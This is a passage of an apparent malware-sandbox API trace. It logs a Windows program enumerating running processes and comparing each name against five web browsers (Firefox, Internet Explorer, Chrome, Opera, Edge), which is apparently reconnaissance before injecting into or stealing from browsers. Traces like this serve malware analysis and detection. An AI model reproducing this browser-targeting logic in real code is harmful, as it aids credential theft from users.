lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0223.309] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0223.309] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0223.309] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.309] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.310] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0223.310] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.310] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0223.310] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0223.310] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.311] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.311] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.311] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.312] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.312] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.312] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.312] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.312] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.314] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0223.314] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0223.314] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0223.314] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0223.314] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.314] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.314] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.314] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.314] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.315] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.315] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.315] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.315] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.315] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.315] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.316] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0223.316] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0223.316] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0223.316] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0223.316] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.316] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0223.316] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0223.316] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0223.316] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0223.316] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.317] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0223.317] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0223.317] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0223.317] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0223.317] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.317] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.317] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0223.317] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0223.317] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0223.317] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0223.317] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.318] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0223.318] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0223.318] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0223.318] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0223.318] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0223.319] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0223.319] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0223.319] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0223.319] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0223.319] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0223.319] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0223.319] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0223.319] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0223.319] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0223.319] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0223.320] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0223.320] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0223.320] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0223.320] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0223.320] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0223.320] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0223.320] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0223.320] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0223.320] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0223.320] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0223.321] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0223.321] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0223.321] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0223.321] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0223.321] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0223.322] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0223.322] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0223.322] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0223.322] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0223.322] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0223.322] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0223.322] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0223.322] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0223.322] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0223.322] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0223.323] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0223.323] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0223.323] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0223.323] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0223.323] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0223.323] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0223.323] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0223.323] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0223.323] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0223.323] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0223.324] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0223.324] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0223.324] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0223.324] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0223.324] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0223.325] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0223.325] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0223.325] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0223.325] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0223.325] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0223.325] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0223.325] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0223.325] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0223.325] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0223.325] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0223.326] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0223.326] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0223.326] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0223.326] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0223.326] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0223.326] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0223.326] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0223.326] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0223.326] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0223.326] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0223.327] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0223.327] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0223.327] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0223.327] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0223.327] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0223.328] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0223.328] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0223.328] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0223.328] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0223.328] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0223.328] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0223.328] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0223.328] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0223.328] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0223.328] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0223.329] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0223.329] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0223.329] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0223.329] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0223.329] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0223.329] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0223.329] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0223.329] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0223.329] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0223.329] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0223.330] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0223.330] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0223.330] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0223.330] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0223.330] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0223.330] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0223.330] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0223.330] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0223.330] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0223.331] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.331] Process32Next (in: hSnapshot=0xe8, 